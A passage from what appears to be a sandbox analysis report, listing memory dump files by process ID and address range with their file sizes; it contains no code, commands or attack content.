                                                                                                                                                                                              5.9MB

                                                                                                                                                                                            • memory/5308-4855-0x0000000140000000-0x00000001405E8000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              5.9MB

                                                                                                                                                                                            • memory/5512-4501-0x000000001B530000-0x000000001B812000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              2.9MB

                                                                                                                                                                                            • memory/5512-4502-0x0000000001E50000-0x0000000001E58000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              32KB

                                                                                                                                                                                            • memory/5860-4933-0x0000000000A70000-0x0000000000A82000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              72KB

                                                                                                                                                                                            • memory/5964-5001-0x0000000000090000-0x00000000000A8000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              96KB

                                                                                                                                                                                            • memory/6408-6216-0x00000000008B0000-0x0000000000918000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              416KB

                                                                                                                                                                                            • memory/6708-5041-0x0000000001ED0000-0x0000000001ED8000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              32KB

                                                                                                                                                                                            • memory/6708-5038-0x000000001B6D0000-0x000000001B9B2000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              2.9MB